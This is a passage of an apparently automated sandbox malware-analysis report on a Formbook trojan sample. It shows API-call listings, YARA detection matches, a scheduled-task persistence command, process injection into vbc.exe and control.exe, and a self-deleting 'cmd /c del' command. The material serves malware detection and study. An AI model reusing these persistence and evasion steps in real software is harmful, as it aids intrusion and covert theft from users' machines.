          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04E59910
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A50 NtCreateFile,LdrInitializeThunk,8_2_04E59A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E595F0 NtQueryInformationFile,8_2_04E595F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59560 NtWriteFile,8_2_04E59560
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59520 NtWaitForSingleObject,8_2_04E59520
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5AD30 NtSetContextThread,8_2_04E5AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59670 NtQueryInformationProcess,8_2_04E59670
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59610 NtEnumerateValueKey,8_2_04E59610
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E597A0 NtUnmapViewOfSection,8_2_04E597A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59760 NtOpenProcess,8_2_04E59760
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A770 NtOpenThread,8_2_04E5A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59770 NtSetInformationFile,8_2_04E59770
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59730 NtQueryVirtualMemory,8_2_04E59730
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A710 NtOpenProcessToken,8_2_04E5A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E598F0 NtReadVirtualMemory,8_2_04E598F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E598A0 NtWriteVirtualMemory,8_2_04E598A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5B040 NtSuspendThread,8_2_04E5B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59820 NtEnumerateKey,8_2_04E59820
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E599D0 NtCreateProcessEx,8_2_04E599D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59950 NtQueueApcThread,8_2_04E59950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A80 NtOpenDirectoryObject,8_2_04E59A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A20 NtResumeThread,8_2_04E59A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A00 NtProtectVirtualMemory,8_2_04E59A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A10 NtQuerySection,8_2_04E59A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A3B0 NtGetContextThread,8_2_04E5A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59B00 NtSetValueKey,8_2_04E59B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031083A0 NtAllocateVirtualMemory,8_2_031083A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_03108270 NtReadFile,8_2_03108270
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031082F0 NtClose,8_2_031082F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031081C0 NtCreateFile,8_2_031081C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310826A NtReadFile,8_2_0310826A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031081BA NtCreateFile,8_2_031081BA
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_00E58D5D0_2_00E58D5D
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303CAE40_2_0303CAE4
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEA20_2_0303EEA2
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEB00_2_0303EEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B8A35_2_0041B8A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C23F5_2_0041C23F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C2AF5_2_0041C2AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C3DF5_2_0041C3DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00408C605_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041CC135_2_0041CC13
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B4A35_2_0041B4A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BD9B5_2_0041BD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BE605_2_0041BE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C6035_2_0041C603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C0D205_2_053C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491D555_2_05491D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492D075_2_05492D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054925DD5_2_054925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F25815_2_053F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E05_2_053DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D841F5_2_053D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D4665_2_0548D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549DFCE5_2_0549DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491FF15_2_05491FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E6E305_2_053E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D6165_2_0548D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492EF75_2_05492EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E41205_2_053E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CF9005_2_053CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054810025_2_05481002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549E8245_2_0549E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A05_2_053F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054928EC5_2_054928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB0905_2_053DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054920A85_2_054920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492B285_2_05492B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FEBB05_2_053FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054803DA5_2_054803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548DBD25_2_0548DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054922AE5_2_054922AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDD4668_2_04EDD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2841F8_2_04E2841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2D5E08_2_04E2D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE25DD8_2_04EE25DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E425818_2_04E42581
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE1D558_2_04EE1D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E10D208_2_04E10D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2D078_2_04EE2D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2EF78_2_04EE2EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E36E308_2_04E36E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDD6168_2_04EDD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE1FF18_2_04EE1FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EEDFCE8_2_04EEDFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE28EC8_2_04EE28EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A08_2_04E420A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE20A88_2_04EE20A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B0908_2_04E2B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EEE8248_2_04EEE824
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED10028_2_04ED1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E341208_2_04E34120
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1F9008_2_04E1F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE22AE8_2_04EE22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED03DA8_2_04ED03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDDBD28_2_04EDDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4EBB08_2_04E4EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2B288_2_04EE2B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F2FB08_2_030F2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310C6038_2_0310C603
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F2D908_2_030F2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310CC138_2_0310CC13
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F8C608_2_030F8C60
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe 767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E1B150 appears 45 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053CB150 appears 45 times
          Source: J0OmHIagw8.exeBinary or memory string: OriginalFilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.241605025.000000000442C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242728474.0000000006AF0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exeBinary or memory string: OriginalFilename2 vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: J0OmHIagw8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/3@20/11
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeMutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF65F.tmpJump to behavior
          Source: J0OmHIagw8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: J0OmHIagw8.exeVirustotal: Detection: 31%
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile read: C:\Users\user\Desktop\J0OmHIagw8.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\J0OmHIagw8.exe 'C:\Users\user\Desktop\J0OmHIagw8.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'Jump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: J0OmHIagw8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: J0OmHIagw8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: J0OmHIagw8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041508E push ebp; iretd 5_2_0041508F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret 5_2_0041C9EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040C2CA push ds; retf 5_2_0040C2E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040C31A push ds; retf 5_2_0040C31E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004153DF pushad ; ret 5_2_004153E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00414DDA pushfd ; retf 5_2_00414DDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040EEAA push esp; retf 5_2_0040EEAF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0541D0D1 push ecx; ret 5_2_0541D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E6D0D1 push ecx; ret 8_2_04E6D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FC31A push ds; retf 8_2_030FC31E
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B3B5 push eax; ret 8_2_0310B408
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031053DF pushad ; ret 8_2_031053E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FC2CA push ds; retf 8_2_030FC2E5
